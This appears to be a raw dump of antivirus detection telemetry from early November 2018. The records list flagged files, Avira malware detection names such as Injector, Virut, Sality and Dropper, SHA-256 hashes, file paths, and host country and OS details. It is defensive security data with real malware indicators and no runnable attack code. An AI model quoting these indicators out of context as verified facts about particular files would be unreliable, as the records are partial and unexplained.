  Row(detection=Row(filename='avscan-20181102-052705-e81c6548', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052705-E81C6548', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052802-09eba7c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052802-09EBA7C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054009-bb48c15c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054009-BB48C15C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051823-b0e513c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051823-B0E513C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054401-455bac15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054401-455BAC15', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060428-210ae803', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060428-210AE803', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060058-a3b004c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060058-A3B004C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055347-a2875991', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055347-A2875991', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053042-6948301a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053042-6948301A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062540-16bd3f96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062540-16BD3F96', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052940-44398648', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052940-44398648', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052811-0ede0b2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052811-0EDE0B2E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052751-034b5b29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052751-034B5B29', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052456-9abf21a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052456-9ABF21A4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054505-6b54cc1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054505-6B54CC1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060009-863b9317', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060009-863B9317', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062005-4f762a62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062005-4F762A62', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='62nkb2wm.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\62nkb2wm.exe', filesize=128000, name='HEUR/AGEN.1035695.#M1.#R1'), hash='87360561a5460d89112d64b3826081504b230c64f9f43eeac66157b4d0c341ed', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060944-dd28908b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060944-DD28908B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051441-2c94c4ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051441-2C94C4EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051205-cf99d9f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051205-CF99D9F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055925-6bdd2dff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055925-6BDD2DFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='815be852e3c74e568ce25f415cf9472f6506d96120fa4a10556505fe054b966d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062307-bbfbf8a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062307-BBFBF8A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054315-2a1d185f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054315-2A1D185F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062332-cad77b58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062332-CAD77B58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054821-e05ffd56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054821-E05FFD56', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061551-b7f19663', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061551-B7F19663', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051216-d618b14f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051216-D618B14F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054845-eead3839', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054845-EEAD3839', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061538-b01e7998', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061538-B01E7998', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:51:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053319-c6ac394e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053319-C6AC394E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051446-2f6ea5b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051446-2F6EA5B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051127-b8dc9dab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051127-B8DC9DAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053450-fd3caa9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053450-FD3CAA9B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060630-69401640', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060630-69401640', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050530-e41a290e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050530-E41A290E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060935-d79b4d0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060935-D79B4D0F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051908-cbc15f6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051908-CBC15F6D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-105538-24266d90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105424-16C0ABD9\\AVSCAN-20181101-105538-24266D90', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=510928, timestamp='2018-11-01T17:35:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0e7ac1eb7df5d875acc83c61dd272eda167c78f9758b0cfd7b176cda6cf8d61b.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0E7AC1EB7DF5D875ACC83C61DD272EDA167C78F9758B0CFD7B176CDA6CF8D61B.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0e7ac1eb7df5d875acc83c61dd272eda167c78f9758b0cfd7b176cda6cf8d61b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:17:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:12:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155123-931e80d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155123-931E80D0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adjprog.exe', filepath='C:\\Users\\X\\Desktop\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T19:47:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh36f4', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH36F4', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:33:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013234-32244231', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2816e781\\AVSCAN-20181102-001608-8FA5C177\\AVSCAN-20181102-013234-32244231', filesize=280000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='140e47f1db1561d3d3a3ac40c64e74d8c3ea372024a8afda97338203a77fe1e4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:32:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T08:46:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh51a0', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH51A0', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:32:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5a90ad557e52ab4d42cf60d0772ae2154485f72f', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\5a90ad557e52ab4d42cf60d0772ae2154485f72f', filesize=1408000, name='W32/Infector.Gen8.#M300.#R700734'), hash='44f7b32922c9d6906fc4a5ad585c8387947403e9c01e3e0f886f811aa06fe6ae', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:17:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:52:16Z'), dt=datetime.date(2018, 11, 1)),
